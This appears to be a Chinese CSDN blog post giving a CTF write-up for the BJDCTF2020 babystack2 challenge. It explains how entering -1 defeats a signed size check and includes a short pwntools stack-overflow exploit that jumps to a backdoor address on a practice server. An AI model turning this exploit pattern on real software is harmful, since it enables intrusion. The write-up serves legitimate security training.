整数溢出练习

已于 2023-03-27 19:53:30 修改
阅读量68 收藏
点赞数
文章标签: 安全 学习方法
于 2023-03-27 19:47:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Civit_/article/details/129802246
版权
文章讲述了在BJDCTF2020的babystack2挑战中,通过分析代码发现无法通过常规的栈溢出来利用read函数。然而,注意到nbytes在条件判断中是signed类型,而在read函数调用中是unsigned,因此可以通过输入-1触发整数溢出来构造exploit。最终,发送特定payload到远程服务器的0x400726地址来执行自定义代码。
摘要由CSDN通过智能技术生成

bjdctf_2020_babystack2

拿到手先查看保护
在这里插入图片描述
然后打开IDA看看代码
在这里插入图片描述
从正常思路来看我们会利用read函数来进行栈溢出,那就得看nbytes大小,再看到nbytes最大为10,无法造成栈溢出,但是if中的是有符号nbytes,而read函数中的是无符号的,这是就可以利用整数溢出。

整数溢出详情可以看——>整数溢出知识

直接输入‘-1’来造成整数溢出,构造exp。

exp:

from pwn import *

io=remote('node4.buuoj.cn',26061)

backdoor=0x400726

io.recv()
io.sendline('-1')
io.recv()

payload=b'a'*(0x10+8)+p64(backdoor)

io.sendline(payload)
io.interactive()

在这里插入图片描述

Lxxxt_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Lua大整数练习
hunter_wyh
11-23 697
—思路 —用一个列表保存数字值 —符号: 用一个字段表示正负符号 —进制: 目前只考虑支持10进制, 不考虑2/8/16进制等 —精确度: 不考虑小数点, 向下取整截取 —压位最大值: 理论上操作系统(64\32位)与Lua版本可能影响最大值; — 如果要计算最大值,只要使用循环一直把数字增加到溢出溢出前的值就是最大值; — 在新的版本上会有math.maxinteger字段表示最大值; — 我们暂且认为10^8是最大的整数值吧;(因为太长会被用e显示, 不方便查看);也就是
C++整数翻转中的溢出问题
weixin_42031459的博客
03-12 773
1、 问题描述: 当输入1234567899时会显示,溢出错误提醒。 2、分析原因: 在32位的编程环境中的int 型数字范围是-231~231-1;-231=-2147483648,231-1=2147483647;而当翻转后的数字在此范围之外的时候,就会发生溢出。 3、错误示范: if(((x*10+*it))<INT_MIN||(x*10+*it)>INT_MAX) { ...
整型提升和溢出运算的理解(纯例题)
鲸落之地
01-02 599
10个简单的小理解例题,关于整型提升,数据溢出,数据截断,算数转换,输出类型转换,赋值类型转换等
《解题报告》(第11例) 溢出
m0_61723200的博客
11-12 89
强调位运算真的很重要,建议大家去看一看计算机系统基础中的反码补码表示等。 【第11题】给出四个数,输出四个数的和 | 溢出了怎么办?_英雄哪里出来-CSDN博客 7. 整数反转 - 力扣(LeetCode) (leetcode-cn.com) 给你一个 32 位的有符号整数 x ,返回将 x 中的数字部分反转后的结果。 如果反转后整数超过 32 位的有符号整数的范围[−231,231− 1] ,就返回 0。 假设环境不允许存储 64 位整数(有符号或无符号)。 示例 1: 输...
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1698
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
Java练习笔记(1)——整数为什么会溢出&判断整数溢出异常的方法
qq_42351519的博客
12-15 1054
整数为什么会溢出 1. 计算机中的整数如何存储? 我们知道计算机中的符号化是根据ASCALL码来映射的。而计算机中的符合映射的基础是0和1. 即,符合在计算机中有对应的01序列。而0和1的序列组合的基础是二进制,因此,当我们想存 储整数在计算机内存中时,一般是将10进制的整数转换为二进制的01序列进行存储的。 2.整型数据类型和二进制的关系是什么? 该问题将让我们对整型的存储有所了解。 首先,我们知道整型数据类型有4个字节组成,一个字节是8个比特,一个比特即为一个01序列中的位, 那么我们知道整
myeclipse springboot 运行内存溢出_关注细节:整数溢出的故事
weixin_39881387的博客
10-27 169
练习题为什么我们使用c = a + (b – a) / 2这个公式,而不是更简单的c = (a + b) / 2?答案为了在计算[a + b]时可能出现的整数溢出。在这个例子中,a和b都是窗口的坐标值,而且这个窗口可能会位于任何位置。如果恰巧窗口被放置到了一个极端的位置,例如(MAXLONG,MAXLONG),则公式中的算术运算可能出现溢出,导致的结果是,中间点的坐标值可能计算错误。请注意,我们使...
安全漏洞--整数溢出漏洞(IOV)分析
热门推荐
关注互联网安全的小虾米一枚
04-19 1万+
一 漏洞简介         整数溢出漏洞(integer overflow):在计算机中,整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数,用1表示负数,而无符号整数则没有这种限制。另外,我们常见的整数类型有8位(单字节字符、布尔类型)、16位(短整型)、32位(长整型)等。关于整数溢出,其实它与其它类型的溢出一样,都是将数据放入了比它本身小的存储空间中,从而出现了溢出。由此引发的一切程序漏洞都
整数运算溢出检查
monkeylee2011的博客
09-22 2731
用c语言实现整数的加法、减法和乘法的溢出判断。
计算机二级c语言资料-计算机二级c语言编程练习题之将只有数字字符串转换为整数.zip
03-23
// 检查溢出,防止整数过大 if (result > INT_MAX / 10 || (result == INT_MAX / 10 && *str - '0' > INT_MAX % 10)) { printf("Overflow error!\n"); return 0; } result = result * 10 + (*str - '0'); ...
递归输出整数_C语言简单程序_递归实现输出整数_
09-30
此外,还需要考虑整数的大小限制,因为超出整数范围的递归可能会导致栈溢出。 递归方法虽然直观,但效率较低,因为每个函数调用都需要占用栈空间。在处理大量数据或深度递归时,应考虑使用非递归算法,如循环,以...
数据结构长整数实验报告
06-26
- 主要问题集中在如何正确处理长整数溢出和进位问题。 - 解决方案通过仔细设计链表结构和相应的算法来确保正确的数据处理。 2. **回顾与分析**: - 设计和编码阶段回顾发现,链表结构的选择非常适合处理变长的...
【盖世汽车-注册安全分析报告】
09-02 1264
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
浅谈网络安全的认识与学习规划
最新发布
qq_201729558
09-05 479
本文主要介绍网络安全认识与学习规划
【数据隐私与安全】数据隐私保护与安全管理
weixin_39372311的博客
09-01 986
数据隐私与安全已成为当今社会不可忽视的重要问题。企业需要在遵守法律法规的基础上,采取有效的技术和管理措施,确保数据的安全与隐私不受侵犯。在未来,随着安全技术的不断发展,数据隐私保护将会更加完善,为企业和个人的数据资产保驾护航。
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 229
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 1097
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
09-02 1138
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
C语言编程练习与解答
这种做法可能导致内存溢出,是不推荐的编程实践。 4. 题目4涉及到静态变量的作用域和生命周期。`fun` 函数内的 `c` 是静态变量,意味着它的值在函数调用之间保持。所以,第一次调用 `fun(a)` 时,`a`、`b` 和 `c` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lxxxt_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值